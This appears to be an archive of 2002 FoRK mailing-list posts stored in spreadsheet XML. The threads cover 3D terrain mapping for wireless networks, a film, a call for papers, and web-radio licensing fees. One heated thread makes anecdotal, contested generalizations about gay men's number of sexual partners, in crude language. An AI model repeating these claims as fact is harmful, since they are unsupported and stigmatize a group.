RH&gt;   "VederÃ², si averÃ² si grossi li coglioni, come ha il re di Franza."
RH&gt;   ("Let's see if I've got as much balls as the King of France!")
RH&gt;   - Pope Julius II, 2 January 1511-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9/8/02 7:38 AM, "Gary Lawrence Murphy"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geo-physically aware real-time network monitoring and management
system and you've really got something...For many applications though, 5-meter data is probably adequate.
-James Rogers
 jamesr@best.com
</t>
  </si>
  <si>
    <t>Robert Harley:
&gt; Gordon Mohr wrote:
&gt; &gt;Definitional nit to pick:
&gt; &gt;You've redefined "promiscuity" above as "total" or "average" activity,
&gt; 
&gt; I think it's clear that I'm talking about averages, so I'm not sure
&gt; why that nit needs to be picked...It was clear you were talking about averages. But it should 
be equally clear that that isn't what people mean when they
use the word "promiscuity". &gt; &gt;which seems to rob it of its common meaning: 
&gt; &gt;activity above some specific threshold (usually "one") 
&gt; 
&gt; In that case, "promiscous" is a vacuous term in modern Western
&gt; societies (but we knew that :), where people average 7 partners or so
&gt; in their adult lives.Not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promiscuous.")The word has a clear meaning, despite your continuing tendency 
to gloss that meaning over with population averages. &gt; &gt;Consider a population of 3 males and 3 females.
&gt; &gt;[...]
&gt; &gt;so in this contrived population, females are more "promiscuous" than males,
&gt; 
&gt; So 1 girl gets 1 guy, 2 girls get 2 guys, 2 guys get 1 girl, 1 guy
&gt; gets 3 girls.  Sounds like six of one versus half a dozen of the other
&gt; to me.OK, then. Consider a population of 1,000,000. 500,000 men each
pair off with 500,000 women. Then, 1 man, let's call him "Wilt",
also has sex with the other 499,999 women. 499,999 women have had more than one partner. 499,999 men have
only had one partner. It is now "perfectly obvious" that in the
common meaning of the term, among this contrived population, 
that women are "more promiscuous" than men -- even though the
single "most promiscuous" person, Wilt, is a man.  "Promiscuity" is not "exactly, perfectly identical between males 
and females", except under a degenerate custom definition of
"promiscuity".&gt; &gt;unless "promiscuity" is defined uselessly.
&gt; 
&gt; Ain't nothin' useless about averages.Averages are useful, sure -- but much more so if called by their 
actual name, rather than conflated with another concept.- Gordon</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 8 Sep 2002, Gordon Mohr wrote:&gt; OK, then. Consider a population of 1,000,000. 500,000 men each
&gt; pair off with 500,000 women. Then, 1 man, let's call him "Wilt",
&gt; also has sex with the other 499,999 women. It is not uncommon to find gay males who had sex with several thousands
partners (there would be more, in fact lots more, probably, but a lot of
them have died). Don't have to be a callboy, if considering that you can
have intercourse with several partners in a single day in a bathouse it
doesn't look particularly difficult to do.Clearly this is not something what hets do, prostitution not taken into
account.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == James Rogers  writes:    J&gt; An example: Being able to model RF propagation in three
    J&gt; dimensions for a metro area when deploying wireless networks.
    J&gt; By having every single tree and building detail and similar,
    J&gt; you can "see" even tiny dead spots due to physical blockage and
    J&gt; signal attenuation.  Hmmm, just as I thought.  In other words, it has no practical uses
whatsoever ;) ... do the biz guys in your office /really/ think WISPs
are really going to shell out /their/ money to find a house or two
they can't reach?  Experience suggests (a) they won't care and (b)
they will even sign up that errant house and then give them a
run-around blaming the dead-spot on "unsupported vendor equipment".Thus, yes, it is 'cool': Expensive toy with no apparent function ;)-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9/8/02 7:38 AM, "Gary Lawrence Murphy"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expense?Planning battle tactics; for this reason, the intelligence press
reports, spy satellites have had 1-meter resolution for many years.Finding an individual vehicle in a city might occasionally be possible
with 1-m images and might occasionally also be worth the money.For small areas you have legitimate access to, it's probably cheaper
to go there with a digital camera and a GPS and take some snapshots
from ground level.  Aerial photos might be cheaper for large areas,
areas where you're not allowed --- or, perhaps, physically able --- to
go, and cases where you don't have time to send a ground guy around
the whole area.-- 
       Kragen Sitaker     
Edsger Wybe Dijkstra died in August of 2002.  The world has lost a great
man.  See http://advogato.org/person/raph/diary.html?start=252 and
http://www.kode-fu.com/geek/2002_08_04_archive.shtml for details.
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9/8/02 3:16 PM, "Gary Lawrence Murphy"  wrote:
&gt;&gt;&gt;&gt;&gt;&gt; "J" == James Rogers  writes:
&gt; 
&gt;   J&gt; An example: Being able to model RF propagation in three
&gt;   J&gt; dimensions for a metro area when deploying wireless networks.
&gt;   J&gt; By having every single tree and building detail and similar,
&gt;   J&gt; you can "see" even tiny dead spots due to physical blockage and
&gt;   J&gt; signal attenuation.
&gt; 
&gt; Hmmm, just as I thought.  In other words, it has no practical uses
&gt; whatsoever ;) ... do the biz guys in your office /really/ think WISPs
&gt; are really going to shell out /their/ money to find a house or two
&gt; they can't reach?  Experience suggests (a) they won't care and (b)
&gt; they will even sign up that errant house and then give them a
&gt; run-around blaming the dead-spot on "unsupported vendor equipment".
Errrr....the biz guys in my office don't care what the "WISPs" want to do
with their little WiFi networks.  And the bandwidth shadows in most cities
are surprisingly large and common.  They aren't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points.The canopies we are talking about aren't short-range wifi technologies, but
a mixture of long-range high-performance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large-scale optimization (cost per mbit, maximizing coverage, and effective
bandwidth available per unit area) in any case.  And for this company's
long-term plans, this type of capability will be absolutely necessary to
keep things sane.Or at least investors find this capability very sexy and compelling,
especially since we have this lovely visualization engine tied into the
system (CLI batches never have the same effect, even if it is more
efficient).-James Rogers
 jamesr@best.com
</t>
  </si>
  <si>
    <t>On Sun, 8 Sep 2002, Eugen Leitl wrote:--]doesn't look particularly difficult to do.
--]
--]Clearly this is not something what hets do, prostitution not taken into
--]account.So lets see, hets dont go to swing clubs, meat markets or the like at all?
Hmm. And being gay means hanging in the bath house being a cum dumpster
while you listen to the Devine Ms M belt one out for the boys?Ugh, with thinking like this who needs the bible belt?</t>
  </si>
  <si>
    <t xml:space="preserve">who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen the original?if it's airing now on the west coast, do catch it.gg
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "K" == Kragen Sitaker  writes:    K&gt; Planning battle tactics; for this reason, the intelligence
    K&gt; press reports, spy satellites have had 1-meter resolution for
    K&gt; many years.The military already have these spy satellites; they are basically
Hubble pointed the other way, so I doubt they will be a big enough
customer of this service to justify a next-generation wireless
network rollout for the rest of us.    K&gt; Finding an individual vehicle in a city might occasionally be
    K&gt; possible with 1-m images and might occasionally also be worth
    K&gt; the money.My car is only just over 1.5 meters across and maybe 3 meters long, so
that means roughly six pixels total surface area.  You might find a
16-wheeler this way, but how often do people misplace a 16-wheeler
such that it is _that_ important to get old images of the terrain?
Since they can't send up aircraft to update images in realtime every
time, how is this different from just releasing the map on DVDs?  Why
wireless?I thought of the common problem of lost prize cattle, but there again,
will there really be business-case for creating a hi-res map of
wyoming on the fly instead of just doing what they do now and hiring a
helicopter for a few hours?    K&gt; For small areas you have legitimate access to, it's probably
    K&gt; cheaper to go there with a digital camera and a GPS and take
    K&gt; some snapshots from ground level.  Aerial photos might be
    K&gt; cheaper for large areas, areas where you're not allowed --- or,
    K&gt; perhaps, physically able --- to go, and cases where you don't
    K&gt; have time to send a ground guy around the whole area.I can see lower-res being useful for Geologists, but considering their
points of interest change only a few times every few million years,
there's not much need to be wireless based on up-to-the-minute data.
I expect most geologists travel with a laptop perfectly capable of DVD
playback, and I also expect the most interesting geology is in regions
where the wireless ain't going to go ;)I don't mean to nit-pick, it's just that I'm curious as to (a) the
need for this product that justifies the extreme cost and (b) how we'd
justify the ubiquitous next-generation wireless network that this
product postulates when we /still/ can't find the killer app for 3G.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == James Rogers  writes:    J&gt; ...  They aren't selling the software, which is pretty pricy as
    J&gt; it happens.  They are using it to optimize next generation
    J&gt; wireless canopies over metro areas and fiber networks on a
    J&gt; large scale.  There are an essentially infinite number of metro
    J&gt; wireless configurations, some of which generate far more dead
    J&gt; or marginal spots and others which are very expensive to
    J&gt; operate (due to backhaul transit considerations) or both.  This
    J&gt; software can be used as a tool to optimize the canopy coverage
    J&gt; and minimize the actual transit costs since the wireless is
    J&gt; tied into fiber at multiple points.So you only need to map a handful of metropolitan areas?    J&gt; Or at least investors find this capability very sexy and
    J&gt; compellingAh ... now /that/ I will believe :)Don't mind me; I'm just getting even more cynical in my old age.   -- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9/8/02 8:09 PM, "Gary Lawrence Murphy"  wrote:
&gt; My car is only just over 1.5 meters across and maybe 3 meters long, so
&gt; that means roughly six pixels total surface area.  You might find a
&gt; 16-wheeler this way, but how often do people misplace a 16-wheeler
&gt; such that it is _that_ important to get old images of the terrain?
&gt; Since they can't send up aircraft to update images in realtime every
&gt; time, how is this different from just releasing the map on DVDs?  Why
&gt; wireless?
It seems that several people are missing the point that this is NOT an image
database.  It is high-resolution topological data rendered in three
dimensions.  Images are overlayed on the topological data to help people
navigate familiar terrain visually.  In other words, it is not intended as a
wannabe spy satellite.  Rather it is a very accurate three dimensional model
of the earth's surface.  When a particular region in question is covered in
a city, the buildings in the city are mapped as though they are part of the
earth's surface.  The part that makes the app killer is that you can map all
sorts of data layers on top of their core topological data.Got it?-James Rogers
 jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gays are 
promiscuous, and so are hets, but I betcha gays are more AIDSphobic than 
hets, generally speaking....
COn Sun, 8 Sep 2002, Tom wrote:&gt; On Sun, 8 Sep 2002, Eugen Leitl wrote:
&gt; 
&gt; --]doesn't look particularly difficult to do.
&gt; --]
&gt; --]Clearly this is not something what hets do, prostitution not taken into
&gt; --]account.
&gt; 
&gt; So lets see, hets dont go to swing clubs, meat markets or the like at all?
&gt; Hmm. And being gay means hanging in the bath house being a cum dumpster
&gt; while you listen to the Devine Ms M belt one out for the boys?
&gt; 
&gt; Ugh, with thinking like this who needs the bible belt?
&gt; 
&gt; 
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy cynicizes:
&gt; Hmmm, just as I thought.  In other words, it has no practical uses
&gt; whatsoever ;) Tourism is the world's largest industry. Using this
to preview your travels, or figure out where you are,
would be very valuable.Online gaming continues to grow. Screw "Britannia", 
real-life Britain would be a fun world to wander/
conquer/explore virtually, in role-playing or real-
time-strategy games.And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Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == James Rogers  writes:    J&gt; ...  The part that makes the app killer is that you can map all
    J&gt; sorts of data layers on top of their core topological data.    J&gt; Got it?Ah, ok ... so some sample applications come to mind, although none of
them require wireless and would do with a DVD, but nonetheless ...- Forestry: Maps of the terrain are essential in predicting the spread
of forest fires, esp if this is overlaid with the type of vegetation,
recent waterfall &amp;c- farming/conservation can use the high-resolution terrain to overlay
water tables or watershed info.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 8 Sep 2002 at 22:15, Geege Schuman wrote:&gt; who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen
&gt; the original?
&gt; 
By "original" if you are referring to the old PBS version, I liked that version much better.  Much more thought provoking.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 8 Sep 2002, CDale wrote:&gt; I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gaysSo how many of your hetero friends had &gt;3 k lovers?&gt; are promiscuous, and so are hets, but I betcha gays are more
&gt; AIDSphobic than hets, generally speaking....The virus load issue is orthogonal to the fact. Bzzt. Switch on your
brain, you both. I was mentioning that a subpopulation outside of the sex
industry is/used to be extremely promiscuous, about two orders of
magnitude higher than average.
</t>
  </si>
  <si>
    <t>Agreed, completely.  I totally grokked the notion of unintened consequence
with the original.-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
Evdemon
Sent: Monday, September 09, 2002 7:03 AM
To: Fork@xent.com
Subject: Re: Recommended Viewing
On 8 Sep 2002 at 22:15, Geege Schuman wrote:&gt; who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen
&gt; the original?
&gt;
By "original" if you are referring to the old PBS version, I liked that
version much better.  Much more thought provoking.</t>
  </si>
  <si>
    <t xml:space="preserve">ok i read back, thats not a typo, you mean three thousand lovers.
where do you get your data? It seems very unlikely, but if you have 
supporting evidence i'd like to see it.ChrisOn Mon, 9 Sep 2002, Eugen Leitl wrote:&gt;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 
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Chris Haun wrote:&gt; ok i read back, thats not a typo, you mean three thousand lovers.
&gt; where do you get your data? It seems very unlikely, but if you have 
&gt; supporting evidence i'd like to see it.I haven't seen any official data on the web (the high-ranking hits are 
overrun by religious bigots), but there's some anecdotal evidence to be 
found in	http://sunsite.berkeley.edu:2020/dynaweb/teiproj/oh/science/aidsnur2/@Generic__BookTextView/5406(search for promiscuity). They mention 300 to 500 partners a year. 
(Anecdotally. This is not a statistic). They also mention that this was 
specific to gay males. Lesbians don't dig promiscuity in that degree.
</t>
  </si>
  <si>
    <t xml:space="preserve">
EL&gt; On Sun, 8 Sep 2002, CDale wrote:&gt;&gt; I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gaysEL&gt; So how many of your hetero friends had &gt;3 k lovers?So Eugen, how many of your homo friends have -had- 3k lovers?In fact, thats a general question for FoRK proper.Do you know anyone, outside of meybee Wilt Chamberlin and a few of the
gang-bang porn queens who -have- had even 1.5k lovers?Eegads, if you're hypothesizing numbers like -that- Eugen, you at
least owe it to FoRK to back that shit up.Otherwise we're liable to assume rampant unfounded homophobia and that
would just be a lose.Just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partners.Qualify yourself, or at least lower your outrageous numbers.=BB
&gt;&gt; are promiscuous, and so are hets, but I betcha gays are more
&gt;&gt; AIDSphobic than hets, generally speaking....EL&gt;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
</t>
  </si>
  <si>
    <t xml:space="preserve">In addition, one bit of anecdotal evidence from a conversation in
1984! in San Fransisco is hardly enough to extrapolate 500 to 3k.This is the only quote I could find relating to promiscuity in
homosexual men."I think people feel a certain invulnerability, especially young
people, like this disease doesn't affect me. The publicity about the disease was very much the kind where it was easy to say, "That isn't me. I'm not promiscuous." Promiscuity, especially, was a piece where people could easily say, "Well, I'm not. Promiscuous is more than I do." If you have 300 partners a year, you can think you're not promiscuous if you know somebody who has 500. So it's all relative, and it was easy to feel that that isn't me."You could find hets who have the same kind of partner volume.  BFD.
This kind of random generation of numbers that leads the nutty
religious bigots (as you mentioned earlier).Grr.   Bits damnit.  Now, I must go brief.-BB
EL&gt;&gt; On Sun, 8 Sep 2002, CDale wrote:&gt;&gt;&gt; I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gaysEL&gt;&gt; So how many of your hetero friends had &gt;3 k lovers?bmn&gt; So Eugen, how many of your homo friends have -had- 3k lovers?bmn&gt; In fact, thats a general question for FoRK proper.bmn&gt; Do you know anyone, outside of meybee Wilt Chamberlin and a few of the
bmn&gt; gang-bang porn queens who -have- had even 1.5k lovers?bmn&gt; Eegads, if you're hypothesizing numbers like -that- Eugen, you at
bmn&gt; least owe it to FoRK to back that shit up.bmn&gt; Otherwise we're liable to assume rampant unfounded homophobia and that
bmn&gt; would just be a lose.bmn&gt; Just a quick assumption here.   I'm not a math geek or anything, but
bmn&gt; assuming 1 lover every day, that would be like at least one lover
bmn&gt; everyday for 8 years and some change.   I don't know about you, but
bmn&gt; very very few of us are -that- lucky (or even close to that lucky)
bmn&gt; and after awhile, even the sexaholics get bored and have to mingle
bmn&gt; something new into their weekends.   You really are assumiing that the
bmn&gt; homosexual population is a) that large in a given area (The meccas
bmn&gt; might qualify, but try finding that kind of homosexual population in
bmn&gt; say, Tulsa, Oklahoma or Manchester, NH (Tho Manchester does have quite
bmn&gt; a few nifty gaybars, but thats a different story)  b) that bored/sex
bmn&gt; obsessed/recreationally free to pursue sex that often, with that many
bmn&gt; partners or that they'd even WANT that many partners.bmn&gt; Qualify yourself, or at least lower your outrageous numbers.bmn&gt; =BB
&gt;&gt;&gt; are promiscuous, and so are hets, but I betcha gays are more
&gt;&gt;&gt; AIDSphobic than hets, generally speaking....EL&gt;&gt; The virus load issue is orthogonal to the fact. Bzzt. Switch on your
EL&gt;&gt; brain, you both. I was mentioning that a subpopulation outside of the sex
EL&gt;&gt; industry is/used to be extremely promiscuous, about two orders of
EL&gt;&gt; magnitude higher than average.-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; So Eugen, how many of your homo friends have -had- 3k lovers?
&gt; 
&gt; In fact, thats a general question for FoRK proper.Uh, zero.  I'm sort of offended at having to take this question seriously,
like being black and having to actually explain that black people don't
all sing and dance.  I'd guess that gay men compared to straight men have
a linearly greater number of sexual partners on the order of 1.5-2X.  But
then again, it not a monolithic or homogeneous community.  Who knows?3K is utter shite.- Lucas
</t>
  </si>
  <si>
    <t>On Sun, 8 Sep 2002, Gordon Mohr wrote:--]Gary Lawrence Murphy cynicizes:
--]&gt; Hmmm, just as I thought.  In other words, it has no practical uses
--]&gt; whatsoever ;)
--]
--]Online gaming continues to grow. Screw "Britannia",
--]real-life Britain would be a fun world to wander/
--]conquer/explore virtually, in role-playing or real-
--]time-strategy games.
Andthus....Geocaching.....this would make a nice little "let me check this
set of coord out before we trek into 10 feet of quicksand"</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002 bitbitch@magnesium.net wrote:&gt; So Eugen, how many of your homo friends have -had- 3k lovers?Just one. Not everybody does that. Most of them are now dead, anyway.
&gt; Do you know anyone, outside of meybee Wilt Chamberlin and a few of the
&gt; gang-bang porn queens who -have- had even 1.5k lovers?Yes. Notice that I've specifically excluded sex industry. That be 
cheating.
&gt; Eegads, if you're hypothesizing numbers like -that- Eugen, you at
&gt; least owe it to FoRK to back that shit up.Ain't done no hypothesizing. Anecdotal evidence'R'Us. Couldn't you just
Google, or something?
&gt; Otherwise we're liable to assume rampant unfounded homophobia and that
&gt; would just be a lose.Yeah, I'm a gay Jew Nazi Muslim who's also a lead character on Kaz's
underworld. Can we go on with the programme now?
&gt; Just a quick assumption here.   I'm not a math geek or anything, but
&gt; assuming 1 lover every day, that would be like at least one lover
&gt; everyday for 8 years and some change.   I don't know about you, but
&gt; very very few of us are -that- lucky (or even close to that lucky)Which was my point. Gurls don't do hyperpromiscuity as a life style. It's
interesting that you're launching into a diatribe, and threaten using
instant argument (just add hominem) instead of assuming I might be not
just pulling this whole thing out my nether orifice.&gt; and after awhile, even the sexaholics get bored and have to mingle
&gt; something new into their weekends.   You really are assumiing that the
&gt; homosexual population is a) that large in a given area (The meccasYou ever been to San Francisco?&gt; might qualify, but try finding that kind of homosexual population in
&gt; say, Tulsa, Oklahoma or Manchester, NH (Tho Manchester does have quiteYeah, I think it could be also difficult finding a gay bathhouse in Thule,
Greenland. Or parts of central Africa. To think of it, both Oort and 
Kuiper belts are utterly devoid of gay people as well. Isn't this 
remarkable?&gt; a few nifty gaybars, but thats a different story)  b) that bored/sex
&gt; obsessed/recreationally free to pursue sex that often, with that many
&gt; partners or that they'd even WANT that many partners.This doesn't happen because it couldn't happen. No one would want to. 
Because you feel that way. Correct?&gt; Qualify yourself, or at least lower your outrageous numbers.I didn't expect so much reflexive knee-jerking on this list.
</t>
  </si>
  <si>
    <t>On Mon, 9 Sep 2002, Lucas Gonze wrote:--]3K is utter shite.
--]3k is a number that probably sounds good to some closted  homophobe with
secret desires to be "belle of the balls". Twinks dinks and dorks, this
thread sounds to me like someone needs a little luvin.</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Lucas Gonze wrote:&gt; a linearly greater number of sexual partners on the order of 1.5-2X.  But
&gt; then again, it not a monolithic or homogeneous community.  Who knows?Did I claim "all gay people are hyperpromiscuous"? For what this is worth,
I would claim they're considerably more promiscuous on the average than
your average het. My utterly unscientific, unsubstatiated claim is that
the typical male would *like* to be considerably more promiscous than your
average female (ay, and here's the rub. pray don't forget the kleenex).  
Look up different reproduction strategies, due to basic hardware
difference (sexual dimorphism). You'd do that too if it happened to you.Once you go past the first three of four pages of hysterical propaganda on
Google you might actually run into real studies. Anyone game? I have to 
work (well, pretend to).
&gt; 3K is utter shite.This is getting better and better. You know 3K is utter shite how? You
just feel the number can't be right, yes? Deep inside? I'm way overposting
today, but I find this entire exchange hee-lay-rious. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom wrote:
&gt; 3k is a number that probably sounds good to some closted  homophobe with
&gt; secret desires to be "belle of the balls". Twinks dinks and dorks, this
&gt; thread sounds to me like someone needs a little luvin.I dunno if I'd accuse everybody who believes the 3K number of needing a
little luvin, but I completely believe that this myth has survived because
there's a lot of people who need more lovin.  Plus it fits in with a bunch
of different archetypes.- Lucas
</t>
  </si>
  <si>
    <t xml:space="preserve">
EL&gt; On Mon, 9 Sep 2002 bitbitch@magnesium.net wrote:&gt;&gt; So Eugen, how many of your homo friends have -had- 3k lovers?EL&gt; Just one. Not everybody does that. Most of them are now dead, anyway.Point is, you're not likely to extrapolate much.  I could probably
find one hetero who had just as much sex.   Does that mean we're all
rampant hos?  No.
&gt;&gt; Eegads, if you're hypothesizing numbers like -that- Eugen, you at
&gt;&gt; least owe it to FoRK to back that shit up.EL&gt; Ain't done no hypothesizing. Anecdotal evidence'R'Us. Couldn't you just
EL&gt; Google, or something?Listen.  If you pull numbers like that without a fact, the automagic
assumption is yes, they were extracted out of your neither orifice.
Point wasn't to conclude otherwise unless you had any relevant bits.
Its not my job to do _your_ bit searching for you, but I figured I'd
humor fork with this bit of finding:http://www.thebody.com/bp/apr01/research_notebook.html  (Pointing ot
averages of about 13 for every 3 months (for gay men), which totals to
about  52 a year.  52 a year doesn't equal 3000.   Or even 300.
&gt;&gt; Just a quick assumption here.   I'm not a math geek or anything, but
&gt;&gt; assuming 1 lover every day, that would be like at least one lover
&gt;&gt; everyday for 8 years and some change.   I don't know about you, but
&gt;&gt; very very few of us are -that- lucky (or even close to that lucky)EL&gt; Which was my point. Gurls don't do hyperpromiscuity as a life style. It's
EL&gt; interesting that you're launching into a diatribe, and threaten using
EL&gt; instant argument (just add hominem) instead of assuming I might be not
EL&gt; just pulling this whole thing out my nether orifice.WTF do my shitty math skillz have to do with girls and
hyperpromiscuity?  I was speaking -generally- meaning that guys and
girls probably have better things to do than boink everything they
see.  As above, I am assuming you're pulling things out of your ass, I
just felt like calling you on it.BTW, there's nothing wrong with calling someone on a silly idea.  Its
allowed, and its generally not considered ad hominem, but the
homophobia statement might be.&gt;&gt; and after awhile, even the sexaholics get bored and have to mingle
&gt;&gt; something new into their weekends.   You really are assumiing that the
&gt;&gt; homosexual population is a) that large in a given area (The meccasEL&gt; You ever been to San Francisco?Many times.  Which is why I said 'assuming that large ... (The meccas
dont count).  SF is a mecca in this example.  I obviously wasn't
clear, tho one could assume I wasn't talking about Medina.&gt;&gt; a few nifty gaybars, but thats a different story)  b) that bored/sex
&gt;&gt; obsessed/recreationally free to pursue sex that often, with that many
&gt;&gt; partners or that they'd even WANT that many partners.EL&gt; This doesn't happen because it couldn't happen. No one would want to. 
EL&gt; Because you feel that way. Correct?doesn't happen?  true.   Couldn't happen?  who knows.   It has nothing
to do with how I 'feel' and everything to do with the fact that people
do concern themselves with more than just sex (otherwise I think we'd
see a helluva lot more of sex, and a helluva lot less of everything
else).
&gt;&gt; Qualify yourself, or at least lower your outrageous numbers.EL&gt; I didn't expect so much reflexive knee-jerking on this list.Well my suggestion is, if you can't take the responses, don't post
flamebait.-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Eugen Leitl wrote:&gt; On Sun, 8 Sep 2002, CDale wrote:
&gt; 
&gt; &gt; I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gays
&gt; 
&gt; So how many of your hetero friends had &gt;3 k lovers?None.  How many of my gay friends have had &gt; 3k lovers?  None.&gt;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
</t>
  </si>
  <si>
    <t>&gt; This is getting better and better. You know 3K is utter shite how? I'm not going to be your spokesman, Eugen.  Figure it out yourself.over and out.</t>
  </si>
  <si>
    <t>Bitbitch writes:
&gt; Listen.  If you pull numbers like that without a fact, the automagic
&gt; assumption is yes, they were extracted out of your neither orifice.
&gt; Point wasn't to conclude otherwise unless you had any relevant bits.
&gt; Its not my job to do _your_ bit searching for you, but I figured I'd
&gt; humor fork with this bit of finding:
&gt; 
&gt; http://www.thebody.com/bp/apr01/research_notebook.html  (Pointing ot
&gt; averages of about 13 for every 3 months (for gay men), which totals to
&gt; about  52 a year.  52 a year doesn't equal 3000.   Or even 300.Er, that study would seem to lend credence to Eugen's
estimations, rather than casting fresh doubts. 52 a year *does* exceed 300, in under 6 years' time. The average
age of that study's participants was *39* -- meaning some 
participants may have had 20-25+ years of active sex life. At that age, and further ** HIV+ **, it seems reasonable to
think that some the participants may have actually slowed 
their pace a bit. So while this study's summary info is incomplete, you could 
easily conclude that the *average* participant in this one study
will have had over a thousand partners over a 40-50+ year active 
sex life, and so the even-more-active tails of the distribution
could easily be in the 3000+ range.Of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Eugen's anecdotal estimation as if it
were sheer fantasy. BitBitch's own citation suggests otherwise.- Gordon</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Priority: normal
Date:         Mon, 9 Sep 2002 08:56:49 +0000
Reply-To:     Law &amp; Policy of Computer CommunicationsSender:       Law &amp; Policy of Computer CommunicationsComments:     Authenticated sender is jakobs@i4mail.informatik.rwth-aachen.de
From:         Kai Jakobs 
Subject: [CYBERIA] [Final CfP]: Int. J. on IT Standards Research
To:           CYBERIA-L@LISTSERV.AOL.COMHello,Just a brief reminder that the deadline for submisisons for issue 2
of the'International Journal of IT Standards &amp; Standardization Research' (JITSR)is October 1.JITSR is a  new, multi-disciplinary publication outlet for everyone who
is doing research into IT standards and standardisation (from whichever
perspective).So if you think you've got a paper that might fit - why not submit
it for JITSR?And please do ask if you need any further information.
Greetings from Aachen.Cheers,
Kai.
-----------------------------
Call for Papersfor Issue 2 of theInternational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transferAuthors are requested to submit their manuscripts as an e-mail
attachment in RTF or PDF to the editor-in-chief at
Kai.Jakobs@i4.informatik.rwth-aachen.de.If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revision.Submission of a paper implies that its content is original and that
it has not been published previously, and that it is not under
consideration for publication elsewhere. Yet, significantly extended
papers previously presented at conferences may be acceptable.For more information please see
http://www-i4.informatik.rwth-aachen.de/~jakobs/standards_journal/journal_home.htmlor visit the publisher's web site at
http://www.idea-group.com/journals/details.asp?id=497
Important Dates for the Inaugural Issue:Submission Deadline for Issue 2:   October 1, 2002
Notification of Acceptance:        December 1, 2002
Camera-ready Paper Due:            January 15, 2003
________________________________________________________________
Kai JakobsTechnical University of Aachen
Computer Science Department
Informatik IV (Communication and Distributed Systems)
Ahornstr. 55, D-52074 Aachen, Germany
Tel.: +49-241-80-21405
Fax:  +49-241-80-22220
Kai.Jakobs@i4.informatik.rwth-aachen.de
http://www-i4.informatik.rwth-aachen.de/~jakobs/kai/kai_home.html
**********************************************************************
For Listserv Instructions, see http://www.lawlists.net/cyberia
Off-Topic threads: http://www.lawlists.net/mailman/listinfo/cyberia-ot
Need more help? Send mail to: Cyberia-L-Request@listserv.aol.com
**********************************************************************---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</si>
  <si>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Just thought i'd pass this on, my favorite radio station in raleigh is 
going off the internet due to the new fees and restrictions associated 
with remaining online.  this is from the station manager and describes the 
situation.---------- Forwarded message ----------
Date: Tue, 3 Sep 2002 13:13:17 -0400
From: Arielle 
Subject: RE: KNC Stream [1:51144:51751]This message was sent from: WKNC Chat.
----------------------------------------------------------------It does, but it's not the cost that is causing us to shut it down. The cost
is a "minimum $500 per year"... but that only accounts for 18 people
streaming and playing like 13 or 14 songs an hour. But we could maybe manage
the 2 cents per person, per 100 songs.The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we'd also have to get
all the DJs to find this info and write it down any time they play a
request, vinyl, or CDs not loaded into the computer. It's ridiculous and
nearly impossible...We would need someone to sit in the studio 24/7 writing down all this info -
which sometimes isn't available, like from earlier album that don't have
serial numbers and barcodes. Then still if only the magic 18 people
webstream our signal, the price would become quite exponential since we play
on average 16 songs an hour, we'd be paying $22.11 everyday to stream to
those 18 people. So really, it does have to do with the internet tax, but it
is a few reasons together why we can't do it after their kill-date. :(
----------------------------------------------------------------
Sent using Phorum software version 3.2.6 
</t>
  </si>
  <si>
    <t xml:space="preserve">Here are numbers that come from a study of a couple of thousand swedes, with 
no reference to sexual preference that I could find. The point would seem to 
be that (1) sexual activity follows a power curve, with a few people, a la 
Wilt Chamberlain, having an extaordinarily large number of sexual contacts, 
ev en in a short period of time and (2) a tendency for men to have more 
partners than women.  I have no idea, being a statistical ignoramus, whether 
the fact that there seem to be more men than women at the extremely 
promiscuous end of the sex-partners-distribution curve means that you'd get 
even more extreme results in a group of men who chiefly have sex with other 
men. 
http://polymer.bu.edu/~amaral/Sex_partners/Content_sex.html&lt;&gt;
As for gay men: There is indeed anecdotal evidence of cases of extreme 
